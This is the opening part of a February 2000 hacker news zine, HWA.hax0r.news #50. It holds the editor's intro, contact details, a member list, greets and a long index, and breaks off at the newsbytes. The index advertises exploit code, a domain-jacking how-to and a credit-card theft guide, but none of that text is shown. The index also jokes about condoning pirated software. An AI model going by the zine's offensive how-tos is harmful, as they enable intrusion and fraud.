[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA 2000=] Number 50 Volume 2 Issue 2 1999 Feb 2000 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== = "ABUSUS NON TOLLIT USUM" = ========================================================================== Editor: Cruciphux (cruciphux@dok.org) A Hackers Without Attitudes Production. (c) 1999, 2000 http://welcome.to/HWA.hax0r.news/ ========================================================================== ____ / ___|_____ _____ _ __ __ _ __ _ ___ | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ | |__| (_) \ V / __/ | | (_| | (_| | __/ \____\___/ \_/ \___|_| \__,_|\__, |\___| |___/ This is #50 covering Jan 16th to Feb 13th, 2000 ========================================================================== "Taking a fat cross section of the underground and security scene today and laying it your lap for tomorrow." ========================================================================== __ __ _ _____ _ _ _ ___ \ \ / /_ _ _ __ | |_|_ _|__ | | | | ___| |_ __|__ \ \ \ /\ / / _` | '_ \| __| | |/ _ \| |_| |/ _ \ | '_ \ / / \ V V / (_| | | | | |_ | | (_) | _ | __/ | |_) |_| \_/\_/ \__,_|_| |_|\__| |_|\___/|_| |_|\___|_| .__/(_) |_| How Can I Help ?? ~~~~~~~~~~~~~~~~~ I'm looking for staff members to help with putting the zine together if you want your name in lights (ie: mad propz and credz in here) and have the time to spare, then here are some of the areas I can use help in: The Big One: ~~~~~~~~~~~ Text to HTML project: This entails converting all existing texts to HTML and including, were appropriate the hyperlinks for urls mentioned in text. Foreign Correspondants and Translators ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I'm also looking for people willing to translate articles from their area (usually Dutch, German, Norwegian etc) to contribute articles and if possible translate them into english for us. You will be marked as HWA staff on our list, please include your email and website info, and bio if you wish to do so, none of this is required however. Your help is appreciated! Site Design ~~~~~~~~~~~ I need some design ideas for the website, i've temporarily revamped it but i'd like to test some new look and feel ideas, if you're a web wizard and want to try your hand at making us a site, email me, and go for it, be warned that we may NOT use your design, but don't let that stop you from trying your hand at it. An online temp/demo site would be helpful. News Collection: ~~~~~~~~~~~~~~~ There are a LOT of sources and resources, many listed here and others in the ether, search these or pick a few of these sources to search for stories of interest and email them to me. Scan for hacked, hacking cracked, cracking, defacement, DoS attack, Cyber cyberwar, etc as an example. CGI and PERL script programming ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I'd like to make the zine contents searchable by keyword/issue online and also display the indexes of online copies of the newsletter. If you have any ideas for this let me know, I could do it myself but If you already have a project laying around that would do for this then why reeinvent the wheel? Also; data grabbers that will snag the news from sites like HNN and strip the HTML off and email the raw news data, etc, headline collectors for security-focus and packetstorm etc are all also good ideas. Theres more of course, if you have something you'd like to contribute let me know and i'll find something for you to do. Thanks for listening cruciphux@dok.org =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ # # @ The HWA website is sponsored by CUBESOFT communications I highly @ # recommend you consider these people for your web hosting needs, # @ @ # Web site sponsored by CUBESOFT networks http://www.csoft.net # @ check them out for great fast web hosting! @ # # # http://www.csoft.net/~hwa @ @ # @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ____ _ / ___| _ _ _ __ ___ _ __ ___(_)___ \___ \| | | | '_ \ / _ \| '_ \/ __| / __| ___) | |_| | | | | (_) | |_) \__ \ \__ \ |____/ \__, |_| |_|\___/| .__/|___/_|___/ |___/ |_| SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... <g> @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... =-----------------------------------------------------------------------= "If live is a waste of time and time is a waste of life, then lets all get wasted and have the time of our lives" - kf ____| _| | __| | __ \ _ \ __| | __| | | __/ | _____|_| _| _|\___|\__| Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news ************************************************************************** *** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed *** *** *** *** please join to discuss or impart news on the zine and around the *** *** scene or just to hang out, we get some interesting visitors you *** *** could be one of em. *** *** *** *** Note that the channel isn't there to entertain you its purpose is *** *** to bring together people interested and involved in the underground*** *** to chat about current and recent events etc, do drop in to talk or *** *** hangout. Also if you want to promo your site or send in news tips *** *** its the place to be, just remember we're not #hack or #chatzone... *** ************************************************************************** =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] HWA.hax0r.news #50 =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. LEGAL & COPYRIGHTS .............................................. 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. THIS IS WHO WE ARE .............................................. ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= "The three most dangerous things in the world are a programmer with a soldering iron, a hardware type with a program patch and a user with an idea." - Unknown 01.0 .. GREETS ........................................................... 01.1 .. Last minute stuff, rumours, newsbytes ............................ 01.2 .. Mailbag .......................................................... 02.0 .. From the Editor................................................... 03.0 .. Slash, Croatian cracker, speaks out............................... 04.0 .. The hacker sex chart 2000 ........................................ 05.0 .. Peer finally arrested after over a decade of IRC terrorism........ 06.0 .. Updated proxies list from IRC4ALL................................. 07.0 .. Rant: Mitnick to go wireless?..................................... 08.0 .. Distrubuted Attacks on the rise. TFN and Trinoo. ................. 09.0 .. Teen charged with hacking, flees to Bulgaria, still gets busted... 10.0 .. Major security flaw in Microsoft (Say it ain't so!! haha)......... 11.0 .. Cerberus Information Security Advisory (CISADV000126)............. 12.0 .. "How I hacked Packetstorm Security" by Rainforest Puppy........... 13.0 .. stream.c exploit ................................................. 14.0 .. Spank, variation of the stream.c DoS.............................. 15.0 .. Canadian Security Conference announcement: CanSecWest............. 16.0 .. Security Portal Review Jan 16th................................... 17.0 .. Security Portal review Jan 24th................................... 18.0 .. Security Portal review Jan 31st................................... 19.0 .. CRYPTOGRAM Jan 15th............................................... 20.0 .. POPS.C qpop vulnerability scanner by Duro......................... 21.0 .. Hackunlimited special birthday free-cdrom offer................... 22.0 .. HACK MY SYSTEM! I DARE YA! (not a contest)........................ 23.0 .. PWA lead member busted by the FBI................................. 24.0 .. Mitnick's Release Statement....................................... 24.1 .. More submitted Mitnick articles................................... 25.0 .. Hackers vs Pedophiles, taking on a new approach................... 26.0 .. SCRAMDISK (Windows) on the fly encryption for your data........... 27.0 .. HNN:Jan 17: MPAA files more suits over DeCSS...................... 28.0 .. WARftpd Security Alert (Will they EVER fix this software??)....... 29.0 .. HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable ............ 30.0 .. HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands...... 31.0 .. HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw ........ 32.0 .. Owning sites that run WebSpeed web db software.................... 33.0 .. Cerberus Information Security Advisory (CISADV000202)............. 34.0 .. Seccurity Focus Newsletter #26.................................... 35.0 .. HNN: Jan 17: NY Student Arrested After Damaging School Computer... 36.0 .. HNN: Jan 17: NSA Wants A Secure Linux ............................ 37.0 .. HNN: Jan 17: Cryptome may be breaaking the law.................... 38.0 .. HNN: Jan 21: H4g1s Member Sentenced to Six Months ................ 39.0 .. HNN: Jan 21: Smurf Attack Felt Across the Country ................ 40.0 .. HNN: Jan 21: CIHost.com Leaves Customer Info On the Net .......... 41.0 .. HNN: Jan 21: False Bids Submitted, Hackers Blamed ................ 42.0 .. HNN: Jan 21: UK to create cyber force............................. 43.0 .. HNN: Jan 21: Army Holds Off Cyber Attack ......................... 44.0 .. HNN: Jan 24: French smart card expert goes to trial............... 45.0 .. HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack .... 46.0 .. HNN: Jan 24: Viruses Cost the World $12.1 Billion ................ 47.0 .. HNN: Jan 24: L0pht and @Stake Create Controversy ($).............. 48.0 .. HNN: Jan 24: Several New Ezine Issues Available .................. 49.0 .. HNN: Jan 25: AIM Accounts Susceptible to Theft ................... 50.0 .. HNN: Jan 25: Outpost Leaks Customer Info ......................... 51.0 .. HNN: Jan 25: DeCSS Author Raided ................................. 52.0 .. HNN: Jan 25: Solaris May Go Free and Open ........................ 53.0 .. HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication. 54.0 .. HNN: Jan 25: Japan Needs US Help With Defacements ............... 55.0 .. HNN: Jan 25: Car Radios Monitored by Marketers ................... 56.0 .. HNN: Jan 26: DoubleClick Admits to Profiling of Surfers .......... 57.0 .. HNN: Jan 26: Support for DeCSS Author Grows ...................... 58.0 .. HNN: Jan 26: China To Require Crypto Registration ................ 59.0 .. HNN: Jan 26: NEC Develops Network Encryption Technology .......... 60.0 .. HNN: Jan 26: UPS announces Worldtalk secure email................. 61.0 .. HNN: Jan 27: Napster Reveals Users Info .......................... 62.0 .. Dissecting the Napster system..................................... 63.0 .. HNN: Jan 27: DVD Lawyers Shut Down Courthouse .................... 64.0 .. HNN: Jan 27: Yahoo May Be Violating Texas Anti-Stalking Law ...... 65.0 .. HNN: Jan 27: Data From Probes of Takedown.com .................... 66.0 .. HNN: Jan 27: Top Ten Viruses of 1999 ............................. 67.0 .. HNN: Jan 27: French Eavesdrop on British GSM Phones .............. 68.0 .. So wtf is the deal with l0pht and @stake? here'$ the FAQ jack..... 69.0 .. Anti-Offline releases majorly ereet 0-day script kiddie juarez!... 70.0 .. HNN: Jan 31: MS Issues Security Patch for Windows 2000 ........... 71.0 .. HNN: "Have script Will destroy" - a buffer overflow article....... 72.0 .. HNN: Cert Warning? : what me worry?? - buffer overflow article.... 73.0 .. HNN: The Japanese Panic Project - buffer overflow article......... 74.0 .. HNN: Jan 31 Bulgarian Indicted for Cyber Crime .................. 75.0 .. HNN: Jan 31: Online Banking Still Immature ....................... 76.0 .. HNN: Jan 31: E-Mail Scanning System In Progress .................. 77.0 .. HNN: Jan 31: USA Today Headlines Changed ......................... 78.0 .. HNN: Jan 31: @Stake and L0pht .................................... 79.0 .. HNN: Jan 31: Book Review: "Database Nation"....................... 80.0 .. HNN: Feb 1st: Interview with DeCSS Author ........................ 81.0 .. HNN: Feb 1st: X.com Denies Security Breach ....................... 82.0 .. HNN: Feb 1st: Microsoft Security, An Oxymoron? ................... 83.0 .. HNN: Feb 1st; Cringely, Defcon, E-Commerce and Crypto ............ 84.0 .. HNN: Feb 1st: Cold War Spies For Hire ............................ 85.0 .. HNN: Feb 1st: More Ezines Available .............................. 86.0 .. HHN: Feb 2nd: WorldWide Protest Against MPAA Planned ............. 87.0 .. HNN: Feb 2nd; DoubleClick Receiving Protests ..................... 88.0 .. HNN: Feb 2nd: More CC Numbers Found on Net ....................... 89.0 .. HNN: Feb 2nd: Clinton Cyber Security Plan Draws Fire ............. 90.0 .. HNN: Feb 2nd: AntiPiracy Campaign Increases Sales ................ 91.0 .. HNN: Feb 2nd: Web Aps, the New Playground ........................ 92.0 .. HNN: Feb 3rd: Malicious HTML Tags Embedded in Client Web Requests. 93.0 .. HNN: Feb 3rd: Curador Posts More CC Numbers ...................... 94.0 .. HNN: Feb 3rd: IETF Says No To Inet Wiretaps ...................... 95.0 .. HNN: Feb 3rd: Medical Web Sites Leak Privacy Info ................ 96.0 .. HNN: Feb 4th: 27 Months for Piracy ............................... 97.0 .. Have you been looking for www.hack.co.za?......................... 98.0 .. HNN: Feb 4th; Security Holes Allow Prices to be Changed .......... 99.0 .. ThE,h4x0r.Br0z toss us a dis ..................................... 100.0 .. HNN: Feb 4th: Carders Congregate in IRC .......................... 101.0 .. HNN: Feb 4th; Tempest Tutorial and Bug Scanning 101 .............. 102.0 .. HNN: Feb 7th; Mitnick to Give Live Interview .................... 103.0 .. HNN: Feb 7th; Anti MPAA Leafletting Campaign a Huge Success ...... 104.0 .. HNN: Feb 7th: Founding Member of PWA Busted ...................... 105.0 .. HNN: Feb 7th; Teenager Busted for Attempted Cyber Extortion of $500 ............................................... 106.0 .. HNN: Feb 7th: Japanese Plan to Fight Cyber Crime ................. 107.0 .. HNN: Feb 7th; Philippine President Web Site Defaced .............. 108.0 .. HNN: Feb 8th: Software Companies Seek to Alter Contract Law ...... 109.0 .. HNN: Feb 8th; Yahoo Taken Offline After Suspected DoS Attack ..... 110.0 .. HNN: Feb 8th; New Hack City Video ................................ 111.0 .. HNN: Feb 8th; Thailand E-commerce Site Stored Credit Cards on .... Mail Server......................................... 112.0 .. HNN: Feb 8th; Script Kiddie Training ............................. 113.0 .. HNN: Feb 8th; Personal CyberWars ................................. 114.0 .. HNN: Feb 8th; Space Rogue Profiled by Forbes ..................... 115.0 .. HNN: Feb 9th: Yahoo, Buy.com, Amazon, E-Bay, CNN, UUNet, Who's.... Next?............................................... 116.0 .. Trinoo Killer Source Code......................................... 117.0 .. Mixter's guide to defending against DDoS attacks.................. 118.0 .. HNN: Feb 9th; Court Authorizes Home Computer Search ............. 119.0 .. HNN: Feb 9th; MPAA Makes Deceptive Demands ...................... 120.0 .. HNN: Feb 9th; Medical Sites Give Out Info ....................... 121.0 .. HNN: Feb 9th; FTC Investigates Amazon Subsidiary on use of....... Customer Info ..................................... 122.0 .. HNN: Feb 9th; Sys Admins Possibly At Fault in Japanese .......... Defacements ....................................... 123.0 .. HNN: Feb 9th; Anonymity and Tracking of the Malicious Intruder... 124.0 .. HNN; Feb 10th; E-Trade, LA Times, Datek, ZD-Net Join List of...... Sites ............................................. 125.0 .. HNN: Feb 10th; NIPC Releases Detection Tools .................... 126.0 .. HNN: Feb 10th; The Underground Reaction .......................... 127.0 .. HNN: Feb 10th; Haiku Worm Now on the Loose ....................... 128.0 .. HNN: Feb 11th; Investigations Continue, Reports of more Possible.. Attacks Surface ................................... 129.0 .. HNN: Feb 11th;Author of Tool Used in Attacks Speaks ............. 130.0 .. HNN: Feb 11th;NIPC Reissues Alert on DDoS ....................... 131.0 .. HNN: Feb 11th; Lawmakers Succumb to Kneejerk Reaction .......... 132.0 .. HNN: Feb 11th; Humor in the Face of Chaos ....................... 133.0 .. HNN: Feb 11th; Britain Passes Despotic Laws ..................... 134.0 .. HHN: Feb 11th; France Sues US and UK over Echelon .............. 135.0 .. HNN; Feb 11th; Mellissa Virus Comes Back ........................ 136.0 .. HWA: aKt0r's story by wyzewun.................................... 137.0 .. ISN: Jan 16:Hacker gang blackmails firms with stolen files....... 138.0 .. How to steal 2,500 credit cards.................................. 139.0 .. Good IDS article from Security Portal............................ 140.0 .. Win2000 security hole a 'major threat'........................... 141.0 .. New hack attack is greater threat than imagined.................. 142.0 .. NSA gets bitten in the ass too................................... 143.0 .. rzsz package calls home if you don't register the software....... 144.0 .. Clinton calls Internet Summit on the DDoS threat................. 145.0 .. ISN: Who gets your trust?........................................ 146.0 .. ISN: Hackers demand 10 Million pounds from Visa.................. 147.0 .. ISN: Cybercrime growing harder to prosecute...................... 148.0 .. ISN: Hacking Exposed (Book review) By Brian Martin............... 149.0 .. ISN: The crime of punishment by Brian Martin..................... 150.0 .. ISN: EDI Security, Control and,Audit(Book review)by Brian Martin. 151.0 .. ISN: "Remember, some 'hackers' make house calls" ie:burglary..... 152.0 .. ISN Japanese Police crack down on hacker attacks................. 153.0 .. ISN:Behind the scenes at "Hackers Inc.".......................... 154.0 .. ISN: Hackers a No-Show at DVD decryption protest (!???).......... 155.0 .. ISN: need C2 security? - stick with NT 4.0 by Susan Menke........ 156.0 .. ISN: Sites cracked with id's and passwords....................... 157.0 .. ISN: Who are these jerks anyway?................................. 158.0 .. Hellvisory #001 - Domain Name Jacking HOW-TO by Lucifer.......... 159.0 .. SSHD Buffer overflow exploit (FreeBSD)........................... 160.0 .. Mozilla curiosity................................................ 161.0 .. Any user can make hard links in Unix............................. 162.0 .. Crash windows boxes on local net (twinge.c)...................... 163.0 .. SpiderMap 0.1 Released........................................... 164.0 .. Windows Api SHGetPathFromIDList Buffer Overflow.................. 165.0 .. Anywhere Mail Server Ver.3.1.3 Remote DoS........................ 166.0 .. .ASP error shows full source code to caller...................... 167.0 .. Bypassing authentication on Axis 700 Network Scanner............. 168.0 .. Novell Bordermanager 3.0 through 3.5 is vulnerable to a slow DoS. 169.0 .. CERN 3.0A Heap overflow advisory................................. 170.0 .. Cfingerd 1.3.3 (*BSD) remote root buffer overflow exploit........ 171.0 .. FreeBSD 3.4-STABLE /usr/bin/doscmd local exploit................. 172.0 .. FireWall-1 FTP Server Vulnerability Background Paper #1.......... 173.0 .. Fool firewalls into opening ports with PASV...................... 174.0 .. InetServ 3.0 remote DoS exploit.................................. 175.0 .. ppp 1.6.14 shows local user the saved PPP password............... 176.0 .. Another screw up in MS's Java Virtual Machine, breaks security... 177.0 .. mySQL password checking routines insecure........................ 178.0 .. Guninski: Outlook and Active Scripting (again, sigh...).......... 179.0 .. Break a BeOS poorman server remotely with url infusion........... 180.0 .. Proftpd (<= pre6) linux ppc remote exploit....................... 181.0 .. Insecure defaults in SCO openserver 5.0.5 leaves the doors open. 182.0 .. Malformed link in SERVU then a list = instant DoS (crash!)....... 183.0 .. FreeBSD 3.3-RELEASE /sbin/umount local exploit................... 184.0 .. Yet another War-ftpd vulnerabilty (why do ppl use this?)......... 185.0 .. Z0rk a Zeus Web Server DoS....................................... 186.0 .. Following up on the DDOS attacks of the past week (various)...... 187.0 .. InetServ 3.0 - Windows NT - Remote Root Exploit.................. 188.0 .. Bugfest! Win2000 has 63,000 'defects'............................ 189.0 .. Legit Hackers Roam Cyberspace for Security....................... 190.0 .. Deutch controversy raises security questions for Internet users.. 191.0 .. PC's Vulnerable to Security Breaches, Experts Say................ 192.0 .. Hacking hazards come with Web scripting territory ............... 193.0 .. Microsoft battles pair of security bugs ......................... 194.0 .. Ex-CIA chief surfed Web on home computer with top-secret data.... 195.0 .. How Safe Is AOL 5.0?............................................. 196.0 .. Teens steal thousands of net accounts............................ 197.0 .. Online Credit Hacker May Be Out For Profit....................... =-------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in.ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Ha.Ha .. Humour and puzzles ............................................ Oi! laddie! send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... * COMMON TROJAN PORTS LISTING..................................... A.1 .. PHACVW linx and references...................................... A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site) A.3 ,, Mirror Sites list............................................... A.4 .. The Hacker's Ethic 90's Style.................................. A.5 .. Sources........................................................ A.6 .. Resources...................................................... A.7 .. Submission information......................................... A.8 .. Mailing lists information...................................... A.9 .. Whats in a name? why HWA.hax0r.news??.......................... A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again). A.11 .. Underground and (security?) Zines.............................. * Feb 2000 moved opening data to appendices, A.2 through A.10, probably more to be added. Quicker to get to the news, and info etc... - Ed =--------------------------------------------------------------------------= @HWA'99, 2000 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ | | ___ __ _ __ _| | | | / _ \/ _` |/ _` | | | |__| __/ (_| | (_| | | |_____\___|\__, |\__,_|_| |___/ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD ** USE NO HOOKS ** Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez Archive?), and does not condone 'warez' in any shape manner or form, unless they're good, fresh 0-day and on a fast site. <sic> cruciphux@dok.org Cruciphux [C*:.] HWA/DoK Since 1989 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you ~~~~~~~ are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. <g> - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc If you still can't think of anything you're probably not that interesting a person after all so don't worry about it <BeG> Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Other methods: Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions! My Preffered chat method: IRC Efnet in #HWA.hax0r.news @HWA 00.2 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ __ ___ ___ \ \ / / |__ ___ __ _ _ __ _____ ____|__ \ \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ / \ V V / | | | | (_) | (_| | | | __/\ V V / __/_| \_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_) Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@home.com......: currently active/programming/IRC+ Foreign Correspondants/affiliate members (Active) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media Zym0t1c ..........................: Dutch/Germany/Europe Sla5h.............................: Croatia Spikeman .........................: World Media/IRC channel enforcer HWA members ......................: World Media Armour (armour@halcon.com.au).....: Australia Wyze1.............................: South Africa Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas 99 issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ thedeuce ytcracker loophole BlkOps vetesgirl Slash bob- CHEVY* Dragos Ruiu pr0xy Folks from #hwa.hax0r,news and other leet secret channels, *grin* - mad props! ... ;-) Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick (free at last) Kevin is due to be released from federal prison on January 21st 2000 for more information on his story visit http://www.freekevin.com/ kewl sites: + http://blkops.venomous.net/ NEW + http://www.hack.co.za NEW -> ** Due to excessive network attacks this site is now being mirrored at http://www.siliconinc.net/hack/ + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ ____ _ | \ | | _____ _____| __ ) _ _| |_ ___ ___ | \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __| | |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \ |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/ |___/ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 Since we provide only the links in this section, be prepared for 404's - Ed +++ When was the last time you backed up your important data? s ++ Phony Tragedy Site Has Virus Contributed by Slash Alaska Airlines warns that a Web site seeking donations for victims of Flight 261 is a phony and that it is carrying a virus. Full Story <http://www.ukhackers.com/04020010.htm> ++ Tough U.S. Bank Privacy Regs Contributed by Slash U.S. regulators took a tough line Thursday on 